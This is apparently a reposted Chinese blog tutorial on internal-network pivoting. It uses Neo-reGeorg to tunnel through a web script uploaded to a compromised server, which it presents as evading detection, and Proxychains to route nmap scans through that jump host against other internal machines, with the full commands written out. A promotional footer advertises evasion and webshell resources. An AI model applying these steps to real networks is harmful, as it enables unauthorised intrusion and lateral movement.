干货 | 内网渗透中使用reGeorg+Proxychains横向测试
2023-2-5 21:36:27 Author: 渗透安全团队(查看原文) 阅读量:11 收藏

概述

reGeorg该工具是基于socks5而且支持的脚本很多,例如aspx|ashx|jsp|jspx|php等等。可以说是内网穿透神器,它的优势是做了加密处理,避免特征检测,生成的脚本也免杀! 主要是把内网服务器的端口通过http/https隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

proxychains可以让命令通过指定的proxy访问网络。

工作原理

通过reGeorg工具建立隧道,在结合proxychains利用该隧道达到内网穿透的效果。

环境介绍

准备工具

reGeorg:https://github.com/L-codes/Neo-reGeorg

Proxychains:https://github.com/rofl0r/proxychains-ng

安装使用

reGeorg:

1.python3 neoreg.py generate -k 123456

生成脚本、 -k 输入自定义密码

2.python3 neoreg.py -k 123456 -u http://192.168.86.128/webug/tunnel.php-p 8888

打通隧道默认是1080 -p指定端口

3.由于他是基于socks5,只需给浏览器配置socks5代理,就可访问内网。

Proxychains:

1.拉取文件安装

git clone https://github.com/rofl0r/proxychains-ng cd proxychains-ng ./configure make make install cp ./src/proxychains.conf /etc/proxychains.conf cd .. && rm -rf proxychains-ng

2.配置代理

vim /etc/proxychains.conf

注:

将proxychains.conf文件中的****dynamic_chain****前面的注释符取消。

默认情况下,执行proxyresolv命令,可能看到该命令没找到错误信息。因为proxyresolv保存在/usr/lib/proxychains3/目录中,而不能被执行。proxyresolv会被proxychains调用,所以将这两个文件放在一个目录中。

*cp /usr/lib/proxychains3/proxyresolv /usr/bin/*

3.通过Proxychains挂载nmap进行扫描

此时我们扫描的数据包是先发到win7即我们的跳板机上,然后跳板机进行转发,以跳板机的名义去攻击内网其他的机器。

proxychains nmap -sT -Pn -p80 192.168.30.13

- END -


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247497378&idx=1&sn=0fd80e0656ab50d72cf74b56958fc3d2&chksm=c1760b0df601821bc1f3aea60b389b2701244e21a32ea17b39c9d3967138a834d6d0492c70cf#rd
如有侵权请联系:admin#unsafe.sh